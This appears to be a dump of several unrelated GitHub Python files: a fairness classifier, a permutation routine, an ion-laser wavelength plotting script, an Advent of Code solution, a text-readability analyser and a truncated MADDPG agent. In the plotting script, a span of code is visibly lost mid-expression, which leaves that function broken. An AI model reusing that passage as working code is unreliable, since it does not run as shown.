RMSprop\nimport torch\nfrom torchmetrics import Accuracy\n \nimport torch.nn.functional as F\nfrom metrics import DemParityMetric, EqualizedOdds, EqualOpportunity\nfrom DRO.robust_loss import RobustLoss\n\n\n\n\nclass Classifier(LightningModule):\n \"\"\"\n Gender predictor for the UCI Adult datatset\n\n params:\n use_robust: boolean. Use DRO loss if true.\n robust_method: enum. values `chi-square` or `cvar`\n input_size: int. Input size. Default = 97\n output_size: int. Output size. Default = 1\n \"\"\"\n\n def __init__(self, input_size=97, output_size=1, lr=.001, betas=None, use_robust=False, robust_method='chi-square') -> None:\n super(Classifier, self).__init__()\n\n self.model = nn.Linear(input_size, output_size) \n\n self.lr = lr\n self.robust_loss = RobustLoss(geometry=robust_method, size=1 if robust_method=='chi-square' else .9, reg=0.01)\n self.loss = nn.BCEWithLogitsLoss() \n\n # metrics to logged \n self.train_acc = Accuracy(task=\"binary\", multiclass=False)\n self.val_acc = Accuracy(task=\"binary\", multiclass=False)\n self.test_acc = Accuracy(task=\"binary\", multiclass=False) \n self.dp = DemParityMetric()\n\n self.dp_test = DemParityMetric()\n self.eo_test = EqualOpportunity()\n self.eod_test = EqualizedOdds()\n\n\n self.dp_train = DemParityMetric()\n\n self.use_robust = use_robust\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x):\n x = self.model(x).squeeze()\n sigmoid_output = self.sigmoid(x)\n return x, sigmoid_output\n\n def loss_fn(self, outputs, targets):\n if not self.use_robust:\n loss = self.loss(outputs, targets)\n else: \n loss = F.binary_cross_entropy_with_logits(outputs, targets, reduction='none')\n self.log(\"acc/n_train\", loss.mean())\n loss = self.robust_loss(loss)\n self.log(\"acc/r_loss\", loss)\n return loss\n\n\n def training_step(self, batch, _): \n x, y, s = batch\n \n output, sigmoid_output = self(x)\n\n loss = self.loss_fn(output, y)\n\n self.train_acc.update(sigmoid_output, y.long())\n\n self.log(\"acc/train\", self.train_acc,\n prog_bar=True, on_epoch=True, on_step=False)\n self.log(\"loss/train\", loss)\n\n self.dp_train.update(sigmoid_output, s)\n self.log(\"dp/train\", self.dp_train, prog_bar=False,\n on_epoch=True, on_step=False)\n\n return loss\n\n def validation_step(self, batch, _):\n \n x, y, s = batch\n\n # print(s)\n output, sigmoid_output = self(x)\n\n loss = self.loss_fn(output, y)\n\n self.val_acc.update(sigmoid_output, y.long())\n\n self.dp.update(sigmoid_output, s)\n\n self.log(\"acc/val\", self.val_acc, prog_bar=True)\n self.log(\"loss/val\", loss, prog_bar=False)\n self.log(\"dp/val\", self.dp, prog_bar=False)\n\n def test_step(self, batch, _):\n x, y, s = batch\n\n _, sigmoid_output = self(x)\n\n #loss = self.loss(output, y)\n\n self.test_acc.update(sigmoid_output, y.long())\n self.dp_test.update(sigmoid_output, s)\n self.eo_test.update(sigmoid_output, y, s)\n self.eod_test.update(sigmoid_output, y, s)\n\n self.log(\"acc/test\", self.test_acc)\n self.log(\"dp/test\", self.dp_test)\n self.log(\"eo/test\", self.eo_test)\n self.log(\"eod/test\", self.eod_test)\n # self.log(\"test/loss\", loss)\n\n def configure_optimizers(self):\n optim = Adam(self.model.parameters(), self.lr)\n return optim\n \n def predict(self, x): \n _, preds = self(x) \n ans = (preds > .5).long()\n return ans\n","repo_name":"patrikken/fair-dsr","sub_path":"src/predictor_y.py","file_name":"predictor_y.py","file_ext":"py","file_size_in_byte":3834,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"41172495427","text":"import math\n\ndef next_permutation(s):\n # find tail: longest sequence of ascending items from end\n tail = len(s) - 1\n while tail > 0 and s[tail-1] >= s[tail]:\n tail -= 1\n # if tail is whole array, then we're already on final permutation\n if tail == 0:\n return False\n # otherwise, swap item before tail with next larger item from tail\n ins = s[tail-1]\n t = len(s)-1\n while s[t] <= ins:\n t -= 1\n ext = s[t]\n s[tail-1],s[t] = ext,ins\n # reverse order of tail\n t = len(s)-1\n for i in range((t-tail)//2+1):\n s[tail+i],s[t-i] = s[t-i],s[tail+i]\n return True\n \n \n\nif __name__ == \"__main__\":\n a = [1,2,3,4,5]\n i = 0\n print(a)\n while next_permutation(a):\n print(a)\n i+=1\n","repo_name":"ntabris/hackerrank-exercises","sub_path":"c/perm-string.py","file_name":"perm-string.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"3666796428","text":"__author__ = 'jwbritto'\n\nimport sys\nimport numpy as np\nimport matplotlib.pylab as plt\nimport matplotlib\nfrom matplotlib.transforms import Bbox, TransformedBbox, \\\n blended_transform_factory\nfrom mpl_toolkits.axes_grid1.inset_locator import BboxPatch, BboxConnector,\\\n BboxConnectorPatch\n\nclass Laser:\n \"\"\"Laser properties\n \"\"\"\n def __init__(self, lambdas, bw, label, type):\n self.type = type\n self.label = label\n self.bw = bw\n if type==\"low_power\":\n self.l1 = np.array([ [x-bw/2, x+bw/2] for x in lambdas])\n if type==\"high_power\":\n self.l1 = np.array([lambdas[0]-bw/2, lambdas[0]+bw/2])\n self.l2 = self.l1/2\n self.l3 = self.l1/3\n self.l4 = self.l1/4\n\n @classmethod\n def high_power(cls, lambda0, bw, label):\n \"\"\"high power lasers support harmonics\n\n :param lambda0: center wavelength, float in nm\n :param bw: gain bandwidth, float in nm\n :param label: laser label, str\n \"\"\"\n return cls([lambda0], bw, label, type=\"high_power\")\n @classmethod\n def low_power(cls, lambdas, bw, label):\n \"\"\"lower power lasers (direct only)\n\n :param lambdas: center wavelengths, [float] in nm\n :param bw: tuning bandwidth, float in nm\n :param label: laser label, str\n \"\"\"\n return cls(lambdas, bw, label, type=\"low_power\")\n\n def __str__(self):\n s = \"{label}:\\n\".format(label=self.label)\n if self.type == \"low_power:\":\n s = s + \" L1={} nm\\n\".format(self.l0)\n return s\n if self.type == \"high_power:\":\n s = s + \" L1={} nm\\n\".format(self.l1)\n s = s + \" L2={} nm\\n\".format(self.l2)\n s = s + \" L3={} nm\\n\".format(self.l3)\n s = s + \" L4={} nm\\n\".format(self.l4)\n return s\n else:\n return \"\"\n\nclass Species:\n \"\"\"Atomic species wavelengths\n \"\"\"\n def __init__(self, name, colors):\n \"\"\"\n :param name: label for ion\n :param colors: dictinary of {{wavelength: \"descriptor\"}, ...}\n \"\"\"\n self.name = name\n self.colors = colors\n\n def __str__(self):\n stmp = [\"{}:,{:.1f}nm, \".format(v, k) for k,v in self.colors.items()]\n s = \"{name} :: {colors}\".format(name=self.name, colors=stmp)\n return s\n\ndef connect_bbox(bbox1, bbox2,\n loc1a, loc2a, loc1b, loc2b,\n prop_lines, prop_patches=None):\n \"\"\"\n\n :param bbox1:\n :param bbox2:\n :param loc1a:\n :param loc2a:\n :param loc1b:\n :param loc2b:\n :param prop_lines:\n :param prop_patches:\n :return:\n \"\"\"\n #http://matplotlib.org/examples/pylab_examples/axes_zoom_effect.html\n if prop_patches is None:\n prop_patches = prop_lines.copy()\n prop_patches[\"alpha\"] = prop_patches.get(\"alpha\", 1)*0.2\n\n c1 = BboxConnector(bbox1, bbox2, loc1=loc1a, loc2=loc2a, **prop_lines)\n c1.set_clip_on(False)\n c2 = BboxConnector(bbox1, bbox2, loc1=loc1b, loc2=loc2b, **prop_lines)\n c2.set_clip_on(False)\n\n bbox_patch1 = BboxPatch(bbox1, **prop_patches)\n bbox_patch2 = BboxPatch(bbox2, **prop_patches)\n\n p = BboxConnectorPatch(bbox1, bbox2,\n #loc1a=3, loc2a=2, loc1b=4, loc2b=1,\n loc1a=loc1a, loc2a=loc2a, loc1b=loc1b, loc2b=loc2b,\n **prop_patches)\n p.set_clip_on(False)\n\n return c1, c2, bbox_patch1, bbox_patch2, p\n\n\ndef zoom_effect01(ax1, ax2, xmin, xmax, **kwargs):\n \"\"\"\n ax1 : the main axes\n ax1 : the zoomed axes\n (xmin,xmax) : the limits of the colored area in both plot axes.\n\n connect ax1 & ax2. The x-range of (xmin, xmax) in both axes will\n be marked. The keywords parameters will be used ti create\n patches.\n http://matplotlib.org/examples/pylab_examples/axes_zoom_effect.html\n \"\"\"\n\n trans1 = blended_transform_factory(ax1.transData, ax1.transAxes)\n trans2 = blended_transform_factory(ax2.transData, ax2.transAxes)\n\n bbox = Bbox.from_extents(xmin, 0, xmax, 1)\n\n mybbox1 = TransformedBbox(bbox, trans1)\n mybbox2 = TransformedBbox(bbox, trans2)\n\n prop_patches=kwargs.copy()\n prop_patches[\"ec\"]=\"none\"\n prop_patches[\"alpha\"]=0.2\n\n c1, c2, bbox_patch1, bbox_patch2, p = \\\n connect_bbox(mybbox1, mybbox2,\n loc1a=3, loc2a=2, loc1b=4, loc2b=1,\n prop_lines=kwargs, prop_patches=prop_patches)\n\n ax1.add_patch(bbox_patch1)\n ax2.add_patch(bbox_patch2)\n ax2.add_patch(c1)\n ax2.add_patch(c2)\n ax2.add_patch(p)\n\n return c1, c2, bbox_patch1, bbox_patch2, p\n\n\ndef zoom_effect02(ax1, ax2, **kwargs):\n \"\"\"\n ax1 : the main axes\n ax1 : the zoomed axes\n\n Similar to zoom_effect01. The xmin & xmax will be taken from the\n ax1.viewLim.\n http://matplotlib.org/examples/pylab_examples/axes_zoom_effect.html\n \"\"\"\n\n tt = ax1.transScale + (ax1.transLimits + ax2.transAxes)\n trans = blended_transform_factory(ax2.transData, tt)\n\n mybbox1 = ax1.bbox\n mybbox2 = TransformedBbox(ax1.viewLim, trans)\n\n prop_patches=kwargs.copy()\n prop_patches[\"ec\"]=\"none\"\n prop_patches[\"alpha\"]=0.2\n\n c1, c2, bbox_patch1, bbox_patch2, p = \\\n connect_bbox(mybbox1, mybbox2,\n loc1a=3, loc2a=2, loc1b=4, loc2b=1,\n prop_lines=kwargs, prop_patches=prop_patches)\n\n ax1.add_patch(bbox_patch1)\n ax2.add_patch(bbox_patch2)\n ax2.add_patch(c1)\n ax2.add_patch(c2)\n ax2.add_patch(p)\n\n return c1, c2, bbox_patch1, bbox_patch2, p\n\n\ndef plotit_all(lasers, ions):\n plt.clf()\n fig = plt.figure(1, figsize=(10,2))\n plt.subplots_adjust(left=0.25, right=0.95, top=0.95, bottom=0.15)\n ax1 = plt.subplot(111)\n\n # plot ion colors\n i=0\n colorlist = ['blue','green','red','cyan','magenta','orange','yellow']\n for ion in ions:\n for nm, label in ion.colors.items():\n s = \"{} {}\".format(ion.name, label)\n line = ax1.axvline(x=nm, color=colorlist[i], linewidth=2, alpha=0.5)\n #txt = ax1.text(x=nm, y=i+.5, s=s, rotation=90\")\n line.set_label(ion.name)\n i+=1\n ax1.legend(loc='upper center',mode='expand', ncol=i)\n\n # plot laser colors\n i = 0\n xmax = 0\n yticks = []; yticklabels = []\n xticks = []; xticklabels = []\n laser_alpha = 1\n for r in lasers:\n yticks.append(0.5 + i)\n yticklabels.append(r.label)\n # fundamental\n if r.type == \"low_power\":\n # there's a list of wavelengths for a low power laser class\n xbars = [(x[0], x[1]-x[0]) for x in r.l1]\n xmax = np.max([xmax, np.max(r.l1)])\n ax1.broken_barh(xbars , (i, 1), facecolors='grey',\n alpha=laser_alpha, linewidth=0)\n if r.type == \"high_power\":\n xbars = [(r.l1[0], r.l1[1]-r.l1[0])]\n xmax = np.max([xmax, r.l1[1]])\n b1 = ax1.broken_barh(xbars , (i, 1), facecolors='red',\n alpha=laser_alpha, linewidth=0,\n label=\"fundamental\")\n\n # second and higher harmonics only for high-power lasers\n if r.type == \"high_power\":\n # second harmonic\n xbars = [(r.l2[0], r.l2[1]-r.l2[0])]\n b2 = ax1.broken_barh(xbars, (i, 1), facecolors='green',\n alpha=laser_alpha, linewidth=0,\n label=\"2nd harmonic\")\n # third harmonic\n xbars = [(r.l3[0], r.l3[1]-r.l3[0])]\n b3= ax1.broken_barh(xbars, (i, 1), facecolors='blue',\n alpha=laser_alpha, linewidth=0,\n label=\"3rd harmonic\")\n # fourth harmonic\n xbars = [(r.l4[0], r.l4[1]-r.l4[0])]\n b4 = ax1.broken_barh(xbars, (i, 1), facecolors='purple',\n alpha=laser_alpha, linewidth=0,\n label='4th harmonic')\n i += 1\n\n yticks.append(1 + i)\n yticklabels.append(\"Sources:\")\n\n # spruce up axes\n ax1.grid(True)\n ax1.set_yticks(yticks)\n ax1.set_yticklabels(yticklabels)\n ax1.set_xlim([125, xmax])\n ax1.set_xlabel(\"wavelength [nm]\")\n plt.show()\n\n\ndef plotit_uv_zoom(lasers, species, fig_title=''):\n nspecies = len(species)\n nions = len(ion_qubits)\n\n xstretch = 0.1\n zoom_x_max = 425\n xmin = 225\n plt.clf()\n plt.figure(1, figsize=(5,5))\n plt.subplots_adjust(left=0.25, right=0.95, top=0.70, bottom=0.1)\n ax1 = plt.subplot(211)\n ax2 = plt.subplot(212)\n\n i = 0\n yticks = []; yticklabels = []\n xticks = []; xticklabels = []\n\n xmax = 0\n for r in lasers:\n yticks.append(0.5 + i)\n yticklabels.append(r.label)\n # fundamental\n if r.type == \"low_power\":\n # there's a list of wavelengths for a low power laser class\n xbars = [(x[0], x[1]-x[0]) for x in r.l1]\n xmax = np.max([xmax, np.max(r.l1)])\n if r.type == \"high_power\":\n xbars = [(r.l1[0], r.l1[1]-r.l1[0])]\n xmax = np.max([xmax, r.l1[1]])\n ax1.broken_barh(xbars , (i, 1), facecolors='red')\n ax2.broken_barh(xbars , (i, 1), facecolors='red')\n\n # second and higher harmonics only for high-power lasers\n if r.type == \"high_power\":\n # second harmonic\n xbars = [(r.l2[0], r.l2[1]-r.l2[0])]\n ax1.broken_barh(xbars , (i, 1), facecolors='green')\n ax2.broken_barh(xbars , (i, 1), facecolors='green')\n # third harmonic\n xbars = [(r.l3[0], r.l3[1]-r.l3[0])]\n ax1.broken_barh(xbars , (i, 1), facecolors='blue')\n ax2.broken_barh(xbars , (i, 1), facecolors='blue')\n # fourth harmonic\n xbars = [(r.l4[0], r.l4[1]-r.l4[0])]\n ax1.broken_barh(xbars , (i, 1), facecolors='purple')\n ax2.broken_barh(xbars , (i, 1), facecolors='purple')\n i += 1\n\n # plot ion colors\n lbl_sqz = 3 # labels are too close, nm\n sqzd = False\n all_colors = [] # list of all ion colors\n for ion in species:\n for nm, label in ion.colors.items():\n sqzd = any( [(abs(x-nm)500mW tuning)\\n\" \\\n \"GREEN is doubled\\n\" \\\n \"BLUE is trippled\\n\" \\\n \"PURPLE is quadrupled\"\n plt.figtext(x=0.75, y=0.99, s=caption_right,\n horizontalalignment=\"left\", verticalalignment='top')\n ax1.grid(True)\n ax1.set_yticks(yticks)\n ax1.set_yticklabels(yticklabels)\n ax2.set_xlim([xmin*(1-xstretch), xmax*(1+xstretch)])\n ax2.set_ylim([0,i+0.5])\n ax2.grid(True)\n ax2.set_yticks(yticks)\n ax2.set_yticklabels(yticklabels)\n ax2.set_ylim([0,i+0.5])\n ax2.set_xlabel(\"wavelength [nm]\")\n ax1.set_xlim([xmin, zoom_x_max])\n zoom_effect01(ax1, ax2, xmin, zoom_x_max)\n plt.figtext(x=.5, y=0.99, s=fig_title,\n horizontalalignment=\"center\", verticalalignment='top',\n weight='bold')\n plt.show()\n\n# diode source data from\n# http://tf.boulder.nist.gov/general/pdf/2765.pdf\n#\nlasers_nist = [Laser.high_power(1118, 40, \"1118nm OPSL\"),\n Laser.high_power(1156, 60, \"1156nm OPSL K3381\"),\n Laser.high_power(1200, 40, \"1200nm OPSL\"),\n Laser.high_power(705, 30, \"705nm OPSL wish\"),\n Laser.low_power([0],\n 2, \"\"),\n # Laser.low_power([1083, 671, 640, 766, 850, 854, 866, 649, 658, 812,\n # 780, 795, 1033, 1092, 882, 650, 935, 718],\n # 2, \"direct sources\"),\n # Laser.low_power(np.array([626, 1178, 844, 852, 922, 814, 842, 1108, 910, 986])/2,\n # 2, \"doubled sources\"),\n # Laser.low_power(np.array([939, 855, 840, 1179, 1191, 984, 1197, 984, 1107])/3,\n # 2, \"tripled sources\"),\n # Laser.low_power(np.array([940, 1140, 1120, 916, 856, 908])/4,\n # 2, \"quadrupled sources\")\n ]\n[print(x) for x in lasers_nist]\n\n# import OPSL chips\n# not for public distribution\nopsl_path = \"C:\\\\Users\\\\jwbritto\\\\Google Drive\\\\0workSync\\\\reference\\\\tomi_laser_colors_opsl.py\"\nexec(open(opsl_path).read())\n\n# qubit and clock ions\n# from ref [0] unless otherwise noted\n# [0] http://tf.boulder.nist.gov/general/pdf/2765.pdf\n# [1] http://link.aps.org/doi/10.1103/PhysRevA.85.012502\nion_qubits = [Species(\"Be+\", {313:\"LC,RA\",\n 235:\"PI\"}),\n Species(\"Mg+\", {280:\"LC,RA\",\n 285:\"PI\"}),\n Species(\"Yb+\", {297:\"PI,LC[1]\",\n 399:\"PI\",\n 556:\"PI\",\n 328:\"LC,RA\",\n 369:\"LC,RA\",\n 935:\"RP\"}),\n Species(\"Ca+\", {422:\"PI\",\n 850:\"RP\",\n 854:\"RP\",\n 866:\"RP\",\n 393:\"LC,RA\",\n 397:\"LC,RA\"}),\n Species(\"Sr+\", {461:\"PI\",\n 407:\"LC,RA\",\n 421:\"LC,RA\",\n 1033:\"RP\",\n 1092:\"RP\"}),\n Species(\"Ba+\", {554:\"PI\",\n 455:\"LC,RA\",\n 493:\"LC,RA\",\n 650:\"RP\"})]\n[print(x) for x in ion_qubits]\n\nspecies_empty = []\n\nneutrals = [Species(\"He*\", {1083:\"LC,DP\"}),\n Species(\"Li\", {671:\"LC,RA,DP\"})]\n\n#plotit_all(lasers, ions)\n# plotit_uv_zoom(lasers_nist, ion_qubits,\n# fig_title=\"OPSLs at NIST (Burd)\")\n# plotit_uv_zoom(lasers_tomi_tested, species_empty,\n# fig_title=\"OPSLs Demonstrated by tut.fi (2015)\")\nplotit_uv_zoom(lasers_tomi_prospects, species_empty,\n fig_title=\"Anticipated OPSLs (2015, tut.fi)\")\n\n","repo_name":"nistpenning/calc","sub_path":"reference/ion_laser_colors.py","file_name":"ion_laser_colors.py","file_ext":"py","file_size_in_byte":15073,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"73782698049","text":"#!/usr/bin/env python3\nfrom sys import argv\n\ndef main():\n x,y = 0,0\n wx,wy = 10,1\n with open(argv[1]) as f:\n input = [line.strip() for line in f]\n for line in input:\n dir = line[0]\n dist = int(line[1:])\n if dir == 'N':\n wy += dist\n elif dir == 'S':\n wy -= dist\n elif dir == 'E':\n wx += dist\n elif dir == 'W':\n wx -= dist\n elif dir == 'L':\n for i in range((dist//90)%4):\n wx,wy = wy,wx\n wx *= -1\n elif dir == 'R':\n for i in range((dist//90)%4):\n wx,wy = wy,wx\n wy *= -1\n elif dir == 'F':\n x += dist * wx\n y += dist * wy\n print(abs(x) + abs(y))\n\nif __name__ == '__main__':\n main()","repo_name":"grvn/aoc2020","sub_path":"12/day12-2.py","file_name":"day12-2.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"29530137684","text":"\"\"\"\n part_1: Every elf carry a quantity of calories, find the maximum amount of it | 66487\n part_2: Top 3 elf calories | 197301\n\"\"\"\nfrom src.common.utils import SolverFunctions\n\ntitle = 'Day 1: Calorie Counting'\nparser_method = 'integers'\nhandle_data = 'paragraph'\n\n\nclass SolveTheDay(SolverFunctions): \n @staticmethod\n def helper(data):\n result = [sum(result) for result in data]\n result.sort(reverse=True)\n return result\n \n @classmethod\n def level_1(cls, data):\n result = cls.helper(data)\n result = result[:3]\n return result[0]\n\n @classmethod\n def level_2(cls, data):\n result = cls.helper(data)\n return sum(result[:3])\n","repo_name":"Vasile-Hij/advent_of_code","sub_path":"py/22/day01.py","file_name":"day01.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"70873226369","text":"import pandas as pd\r\nfrom textblob import TextBlob\r\nimport nltk\r\nnltk.download('cmudict')\r\nfrom nltk.corpus import cmudict\r\nfrom nltk.tokenize import word_tokenize\r\nfrom nltk.tag import pos_tag\r\nimport os\r\nimport csv\r\ndef analyze_text(file_path):\r\n # Read text from file\r\n with open(file_path, 'r') as f:\r\n text = f.read()\r\n\r\n # Create a TextBlob object\r\n blob = TextBlob(text)\r\n\r\n # Generate sentiment scores\r\n positive_score = round(blob.sentiment.polarity,2)\r\n negative_score = round(1- positive_score,2)\r\n polarity_score = round(blob.sentiment.polarity,2)\r\n subjectivity_score = round(blob.sentiment.subjectivity,2)\r\n\r\n # Generate average sentence length\r\n try :\r\n avg_sentence_length = round(sum(len(sentence.words) for sentence in blob.sentences) / len(blob.sentences),2)\r\n except ZeroDivisionError:\r\n avg_sentence_length = 0\r\n \r\n # Tokenize the text\r\n words = word_tokenize(text)\r\n\r\n # Generate complex word count\r\n d = cmudict.dict()\r\n def nsyl(word):\r\n try:\r\n return [len(list(y for y in x if y[-1].isdigit())) for x in d[word.lower()]][0]\r\n except KeyError:\r\n # Handle the case where the word is not in the dictionary\r\n return 0\r\n \r\n complex_word_count = sum(1 for word in words if nsyl(word) >= 3)\r\n \r\n # Generate FOG index\r\n def fog_index(words):\r\n complex_words = 0\r\n for word in words:\r\n if len(word) >= 3:\r\n if any(c.isalpha() and c.isupper() for c in word):\r\n complex_words += 1\r\n try :\r\n return round(0.4 * ( (len(words) / len(nltk.sent_tokenize(text))) + (100 * (complex_words / len(words))) ),2)\r\n except ZeroDivisionError:\r\n return 0\r\n\r\n\r\n fog = fog_index(words)\r\n \r\n # Generate average number of words per sentence\r\n try:\r\n avg_num_words_per_sentence = round(len(words) / len(nltk.sent_tokenize(text)),2)\r\n except ZeroDivisionError:\r\n avg_num_words_per_sentence = 0 \r\n \r\n # Generate word count\r\n word_count = len(words)\r\n \r\n # Generate syllable per word\r\n try :\r\n syllable_per_word = round(sum(nsyl(word) for word in words) / word_count,2)\r\n except ZeroDivisionError:\r\n syllable_per_word = 0\r\n \r\n # Generate personal pronouns\r\n personal_pronouns = sum(1 for word, pos in pos_tag(words) if pos == 'PRP')\r\n \r\n # Generate average word length\r\n try:\r\n avg_word_length = round(sum(len(word) for word in words) / word_count,2)\r\n except ZeroDivisionError:\r\n avg_word_length = 0\r\n \r\n #Generate percentage of complex words\r\n try:\r\n per_complex_words = round(((complex_word_count/word_count)*100),2)\r\n except ZeroDivisionError:\r\n per_complex_words = 0\r\n \r\n # Create a dataframe to store the scores\r\n # scores = pd.DataFrame({'POSITIVE SCORE' : [positive_score],\r\n # 'NEGATIVE SCORE' : [negative_score],\r\n # 'POLARITY SCORE' : [polarity_score],\r\n # 'SUBJECTIVITY SCORE' : [subjectivity_score],\r\n # 'AVG SENTENCE LENGTH' : [avg_sentence_length],\r\n # 'PERCENTAGE OF COMPLEX WORDS' : [per_complex_words],\r\n # 'FOG INDEX' : [fog],\r\n # 'AVG NUMBER OF WORDS PER SENTENCE' : [avg_num_words_per_sentence],\r\n # 'COMPLEX WORD COUNT' : [complex_word_count],\r\n # 'WORD COUNT' : [word_count],\r\n # 'SYLLABLE PER WORD' : [syllable_per_word],\r\n # 'PERSONAL PRONOUNS' : [personal_pronouns],\r\n # 'AVG WORD LENGTH' : [avg_word_length]})\r\n scores = {'POSITIVE SCORE' : positive_score,\r\n 'NEGATIVE SCORE' : negative_score,\r\n 'POLARITY SCORE' : polarity_score,\r\n 'SUBJECTIVITY SCORE' : subjectivity_score,\r\n 'AVG SENTENCE LENGTH' : avg_sentence_length,\r\n 'PERCENTAGE OF COMPLEX WORDS' : per_complex_words,\r\n 'FOG INDEX' : fog,\r\n 'AVG NUMBER OF WORDS PER SENTENCE' : avg_num_words_per_sentence,\r\n 'COMPLEX WORD COUNT' : complex_word_count,\r\n 'WORD COUNT' : word_count,\r\n 'SYLLABLE PER WORD' : syllable_per_word,\r\n 'PERSONAL PRONOUNS' : personal_pronouns,\r\n 'AVG WORD LENGTH' : avg_word_length}\r\n return scores\r\n\r\n# Create an empty dataframe\r\nscores = pd.DataFrame(columns=['POSITIVE SCORE','NEGATIVE SCORE','POLARITY SCORE',\r\n 'SUBJECTIVITY SCORE','AVG SENTENCE LENGTH','PERCENTAGE OF COMPLEX WORDS',\r\n 'FOG INDEX','AVG NUMBER OF WORDS PER SENTENCE','COMPLEX WORD COUNT', 'WORD COUNT',\r\n 'SYLLABLE PER WORD', 'PERSONAL PRONOUNS', 'AVG WORD LENGTH'])\r\n\r\ndef get_text_files(directory):\r\n text_files = []\r\n for file in os.listdir(directory):\r\n if file.endswith(\".txt\"):\r\n text_files.append(file)\r\n text_files_list = text_files[51:144] + text_files[0:51]\r\n return text_files_list\r\n# print(get_text_files(\"extract\"))\r\n\r\n# print(f'extract/{get_text_files(\"extract\")[0]}')\r\n# print(f'extract/{get_text_files(\"extract\")[0]}.txt')\r\n\r\nfor i in range(len(get_text_files(\"extract\"))):\r\n path = f'extract/{get_text_files(\"extract\")[i]}'\r\n with open(path, 'r') as f:\r\n analysis = analyze_text(path)\r\n # print(analysis)\r\n scores = scores.append(analysis, ignore_index=True)\r\n print(scores)\r\n\r\n\r\nscores.to_excel(\"scores.xlsx\", sheet_name='Sheet1')\r\n# Read the existing Excel file\r\nexisting_df = pd.read_excel('Output Data.xlsx')\r\n\r\n# Concatenate the existing dataframe with the new one containing the scores\r\nresult_df = pd.concat([existing_df, scores], axis=1)\r\n\r\n# Save the resulting dataframe to an Excel file\r\nresult_df.to_excel('Output Data Structure.xlsx', index=False)\r\n\r\n \r\n \r\n","repo_name":"heathbrew/Text-Analysis-of-Online-Articles","sub_path":"analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":6218,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"71276310530","text":"import random\n\nimport wandb\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn.utils import clip_grad_norm_\nimport torch.optim as optim\nimport numpy as np\nfrom tqdm import tqdm\n\nfrom .utils import update_model\nfrom .actor_critic import Actor, Critic\nfrom .replay_memory import ReplayMemory\n\nclass MADDPGAgent(nn.Module):\n def __init__(self, device, agents, obs_dims, action_dims, lr,\n gamma=0.99, eps=1.0, eps_decay=0.9, eps_min=0.05, batch_size=800, tau=0.001):\n super(MADDPGAgent, self).__init__()\n\n self.device = device\n self.agents = agents\n self.n_agents = len(self.agents)\n self.obs_dims = obs_dims\n self.action_dims = action_dims\n\n self.lr = lr\n self.gamma = gamma\n self.eps = eps\n self.eps_decay = eps_decay\n self.eps_min = eps_min\n self.batch_size = batch_size\n self.tau = tau\n self.step = 0\n self.decay_step = 2000\n\n self.actor = nn.ModuleDict({agent: Actor(self.obs_dims[agent], self.action_dims[agent]).to(self.device) for agent in self.agents})\n self.target_actor = nn.ModuleDict({agent: Actor(self.obs_dims[agent], self.action_dims[agent]).to(self.device) for agent in self.agents})\n for agent in self.agents:\n update_model(self.actor[agent], self.target_actor[agent], tau=1.0)\n\n self.critic = nn.ModuleDict({agent: Critic(self.obs_dims[agent] * self.n_agents + self.action_dims[agent] * self.n_agents, 1).to(self.device) for agent in self.agents})\n self.target_critic = nn.ModuleDict({agent: Critic(self.obs_dims[agent] * self.n_agents + self.action_dims[agent] * self.n_agents, 1).to(self.device) for agent in self.agents})\n for agent in self.agents:\n update_model(self.critic[agent], self.target_critic[agent], tau=1.0)\n\n self.mse_loss = nn.MSELoss()\n self.actor_optimizer = optim.Adam(self.actor.parameters(), lr=1e-4)\n self.critic_optimizer = optim.Adam(self.critic.parameters(), lr=1e-4)\n\n self.memory = ReplayMemory(self.agents, capacity=125000, device=self.device)\n\n def select_action(self, state):\n actions, action_norms = {}, {}\n for agent in self.agents:\n obs = torch.from_numpy(state[agent]).float().unsqueeze(0).to(self.device)\n if random.random() < self.eps:\n action = np.zeros(self.action_dims[agent])\n action[random.randint(0, self.action_dims[agent]-1)] = 1.0\n else:\n action = self.actor[agent](obs).detach().cpu().numpy().squeeze(0)\n action_norm = action.argmax()\n \n actions[agent] = action\n action_norms[agent] = action_norm\n return actions, action_norms\n\n def push(self, transition):\n self.memory.push(transition)\n\n def train_start(self):\n return len(self.memory) >= self.batch_size\n\n def train(self):\n states, actions, next_states, rewards, dones = self.memory.sample(self.batch_size)\n\n total_value_loss = 0.0\n total_policy_loss = 0.0\n\n for target_agent in self.agents:\n joint_state = torch.cat([states[agent] for agent in self.agents], dim=-1)\n joint_actions = torch.cat([actions[agent] for agent in self.agents], dim=-1)\n current_q_values = self.critic[target_agent](torch.cat([joint_state, joint_actions], dim=-1))\n\n joint_next_state = torch.cat([next_states[agent] for agent in self.agents], dim=-1)\n joint_next_actions = torch.cat([self.target_actor[agent](next_states[agent]) for agent in self.agents], dim=-1)\n next_q_values = self.target_critic[target_agent](torch.cat([joint_next_state, joint_next_actions], dim=-1)).detach()\n target_q_values = rewards[target_agent] + self.gamma * next_q_values * (1 - dones[target_agent])\n # Add Normalization\n target_q_values = (target_q_values - target_q_values.mean()) / target_q_values.std()\n\n value_loss = self.mse_loss(target_q_values, current_q_values)\n self.critic_optimizer.zero_grad()\n value_loss.backward()\n clip_grad_norm_(self.critic.parameters(), 10.0)\n self.critic_optimizer.step()\n\n joint_actions = []\n for agent in self.agents:\n if agent == target_agent:\n joint_actions.append(self.actor[agent](states[agent]))\n else:\n joint_actions.append(actions[agent])\n joint_actions = torch.cat(joint_actions, dim=-1)\n\n policy_loss = -self.critic[target_agent](torch.cat([joint_state, joint_actions], dim=1)).mean()\n self.actor_optimizer.zero_grad()\n policy_loss.backward()\n clip_grad_norm_(self.actor.parameters(), 10.0)\n self.actor_optimizer.step()\n\n update_model(self.actor[target_agent], self.target_actor[target_agent], tau=self.tau)\n update_model(self.critic[target_agent], 